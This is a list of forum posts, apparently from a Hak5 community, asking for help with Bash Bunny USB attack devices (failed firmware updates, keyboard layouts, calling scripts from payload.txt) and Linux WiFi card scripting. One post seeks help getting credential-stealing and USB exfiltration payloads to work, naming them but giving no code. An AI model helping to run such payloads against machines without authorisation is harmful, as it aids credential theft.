  19. Hi all, I am creating some shell scripts that occasionally need to use an external Alfa WiFi card, but not all of the time. Rather than leaving the Alfa card enabled constantly, I would like the script to bring the card online when it is required, and switch it back off when it is not. I have read various methods to do this online, but none seem definitive, so I would like to ask which method I should use. So far, I have seen suggestions of; Using WLAN# up and WLAN# down Disabling USB ports using Hub-CTRL Using hardware add-ons This or this (unknown what is being done here) Even people saying it's not possible. What would you suggest? Has anyone else had any luck with switching off and back on an Alfa Wifi Card from a Linux command line/script? I haven't yet played around, as I'm not at home, but I don't want to waste my time trying a method that won't work as well as something else. Thank you.
  20. Im having some issues updating the bash bunny to the most recent firmware. I am currently on the base firmware from when I have purchased the device and have run apt-get update && apt-get upgrade after getting internet with my linux machine. I then download the firmware .tar file from the downloads area and copy the file to the / directory of the bash bunny. I then safely eject the device in arming mode and plug it back in expecting to see a red blinking light. Unfortunately it does nothing and boots to the regular storage mode and nothing has changed. I have searched the forums for help but I can't seem to figure out why this is happening. Can someone help me out with this issue?
  21. Hi guys, So I'm trying to call a shell script (.sh) from inside the payload.txt file (like install.sh or a.sh), but everything I have tried has come to nuttin'. I've tried things like this: chmod +x ./test.sh ./test.sh chmod +x ./test.sh bash ./test.sh chmod +x ./test.sh sh ./test.sh chmod +x ./test.sh source ./test.sh chmod +x ./test.sh ( "./test.sh" ) But none are working. I have the '#!/bin/bash' shebang on the first line of the shell script AND the payload.txt, and the shell script is in the same directory as the payload.txt. EDIT: I did also try removing the './' from the chmod call when I specify the filename. Any ideas on how to call on another script from the payload script?
  22. Hi all, I have multiple wireless devices connected to one computer and I'm trying to create a BASH script to find the LogicalName of one of them automatically. For example, I have WLAN0, WLAN1 and WLAN2 connected. I want to find the LogicalName for my 'Super Awesome WiFi Thingy'. So far I have been unable to find a line of BASH that will take the Device Name 'Super Awesome WiFi Thingy' and find which WLAN LogicalName it belongs to. Any ideas? *Edit* I need to output to a variable in format 'WLAN#', rather than just display a list of devices. Thank you.
  23. Apparently I've tried to update to 1.1 incorrectly. It has a solid green on startup then it turns blank. After three times it goes into recovery mode I am assuming. Then once there it blinks red for a while. Then it turns blank again. I've waited ten minutes tried to replug it in assuming something went wrong it it was done. But it never blinks or goes solid green or blue after the red blinking. But just now It was blinking red then started to alternate red to blue. Now it's blank again, I will wait another fifteen minutes before I try anything else. What exactly is going on? I am assuming it's either trying to recover then flash. I moved the upgrade contents to the root file system. I don't know exactly what went wrong. Easier way to understand the problem: Plug In > Solid Green > Blank LED ........ Ten minutes has passed.... Replug In > Solid Green > Blank LED ....... Ten minutes has passed.... Replug In > Solid Green Blank LED ...... Ten minutes has passed.... Replug In > Blinking Red > Couple of Minutes Passed > Blinking Red . Blinking Blue . Blinking Red > Couple of Minutes Passed > Blinking Red > Couple of Minutes Passed > BLANK LED!!!! Ten minutes has passed... Replug In > Solid Green > Blank LED Every time it tries to recover then it will try to boot three times and try to recover again. It will never fully boot up nor will Kali recognize the file system or that it's plugged in.
  24. Hey guys? I have been trying the executable installer and usb exfiltrator for bash bunny but it's not working. The only payload that is working is the quickcreds payload. Is it because I installed the tools that the executable installer and usb exfiltrator are not working? I made sure that the "d.cmd", "e.cmd" and "i.vbs" files are in the ROOT of the the bashbunny and the "payload.txt" is in the "switch1" of the Bash Bunny. What is going on? Please help.
  25. Basically up until the 1.1 release update the ducky commands were working perfectly. But now the only language which it can use is US (which is a problem as i live in UK). I have tried everything and looked everywhere on the forums but no luck. As I said it worked before the update so there probably is an easy fix, but any help would be appreciated....
  • Create New...